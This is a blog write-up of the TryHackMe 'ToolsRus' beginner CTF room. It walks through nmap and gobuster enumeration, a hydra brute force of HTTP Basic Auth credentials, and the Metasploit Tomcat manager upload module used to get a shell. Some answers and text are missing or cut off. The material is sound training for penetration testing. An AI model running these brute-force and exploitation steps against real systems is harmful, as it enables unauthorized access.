Challenges: ToolsRus (TryHackMe)

JebitokJebitok
3 min read

Table of contents

Welcome to ToysRus, a beginner-friendly CTF room designed to introduce essential enumeration and exploitation tools commonly used in penetration testing. In this challenge, we leverage tools like Nmap, Gobuster, Hydra, Nikto, and Metasploit to uncover hidden directories, crack credentials, and ultimately gain shell access to the target system.

The walkthrough simulates real-world scenarios involving web directory discovery, brute-forcing HTTP Basic Auth credentials, and exploiting vulnerable services such as Apache Tomcat. By methodically combining enumeration and exploitation, we progress through various stages — each building on information gathered earlier.

ToysRus

Your challenge is to use the tools listed below to enumerate a server, gathering information along the way that will eventually lead to you taking over the machine.

This room will introduce you to the following tools:

  • Dirbuster

  • Hydra

  • Nmap

  • Nikto

  • Metasploit

If you are stuck at any point, each tool has a respective room or module linked above.

Answer the questions below

  1. What directory can you find, that begins with a "g"?

    Starting off with enumeration using nmap, gobuster and checking the site among others

    nmap -sV IP_Address

    gobuster dir -u http://IP_Address -w /usr/share/wordlists/dirb/common.txt

    the directory is revealed:

  2. Whose name can you find from this directory?

    check the site with the directory as the path:

  3. What directory has basic authentication?

  4. What is bob's password to the protected part of the website?

    hydra -l bob -P /usr/share/wordlists/rockyou.txt IP_Address http-get /protected

  5. What other port that serves a webs service is open on the machine?

    nmap -sV -sC IP_Address

  6. What is the name and version of the software running on the port from question 5?

  7. Use Nikto with the credentials you have found and scan the /manager/html directory on the port found above.

How many docume0

navigated to /manager/html the counted the ones with 0

  1. What is the server version?

  2. What version of Apache-Coyote is this service using?

    check the nmap results

  3. Use Metasploit to exploit the service and get a shell on the system.

What user did you get a shell as? 

    msfconsole 

    search tomcat mgr upload 

    use 

    show options

    set HttpPassword

    set HttpUsername 

    set RHOSTS 

    set RPORT

this first time it didn’t work so I had to try again

  1. What flag is found in the root directory?

The ToysRus CTF box was an excellent hands-on exercise in foundational offensive security techniques. Through a combination of enumeration (via Nmap, Gobuster, and Nikto) and exploitation (with Hydra and Metasploit), we successfully navigated from reconnaissance to post-exploitation.

We uncovered sensitive directories, brute-forced credentials to protected areas of a web app, and exploited a misconfigured Tomcat Manager interface to gain shell access — ultimately retrieving the root flag. This challenge reinforces the value of thorough reconnaissance, patience, and chaining information to escalate privileges.

Whether you’re just getting started in your ethical hacking journey or preparing for certifications, ToysRus is a strong reminder that even beginner tools, when used correctly, can uncover powerful attack paths.

0
Subscribe to my newsletter

Read articles from Jebitok directly inside your inbox. Subscribe to the newsletter, and don't miss out.

CTF Writeupgobustermetasploitapache tomcatnmapWebPentesting

Written by

Jebitok
Jebitok

Software Developer | Learning Cybersecurity | Open for roles * If you're in the early stages of your career in software development (student or still looking for an entry-level role) and in need of mentorship, you can reach out to me.